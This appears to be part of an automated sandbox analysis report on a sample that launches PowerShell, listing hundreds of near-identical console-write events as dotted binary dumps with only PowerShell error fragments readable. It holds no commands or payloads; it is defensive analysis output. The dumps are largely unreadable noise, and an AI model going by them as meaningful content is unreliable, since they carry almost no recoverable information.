          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......t........b.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........c.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......,c.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......8c.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Jc.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Vc.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......hc.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......tc.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......t........c.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........c.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........c.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........d.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........d.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......)d.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......5d.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Hd.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Td.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......fd.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......rd.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......t........d.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........d.........................s............................8...............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&..............PN.............................}..w.............................1......(.P..............3........&..............]..............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................CmN........................l....}..w.....]......\.......................(.P.....h...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&......................................]......}..w.............*g........l......f.....(.P.....h.................&.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................CmN........................l....}..w.....]......\.......................(.P.....h...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&......................................]......}..w.............*g........l......f.....(.P.....h.................&.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..*g........l......f.....(.P.....h...............H....... .......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&......................................]......}..w.............*g........l......f.....(.P.....h.................&.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.h...............H.......@.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&......................................]......}..w.............*g........l......f.....(.P.....h.................&.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...H.......N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&......................................]......}..w.............*g........l......f.....(.P.....h.................&.....l.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........]......}..w.............*g........l......f.....(.P.....h...............H...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................]..............0....r...W......}..w............@E......^...............(.P.....h...............h...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................]...................r...W......}..w............@E......^...............(.P.....h...............h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......(..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......:..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......F..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......X..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......d..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......v..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......#..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......5..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......A..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......S..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d......._..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......q..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......}..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......$..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............0..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............B..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............N..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............`..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............l..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............~..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............+..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............=..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............I..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............[..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............g..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............y..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............&..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............8..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............D..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............V..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............f..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(...............}..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............@..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............M..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..............._..........................s....................~.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............k..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........}..........................s.................... .......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................R.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................R.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............&..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............H..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............T..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......f..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............r..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............%..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............1..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......C..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............O..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............a..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............m..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3....... ..........................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............,..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............>..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............J..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............\..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............h..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............z..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............(..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............:..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............F..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............X..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............d..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............v..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............1..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......@..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......S..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D......._..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......q..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......}..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................h...............
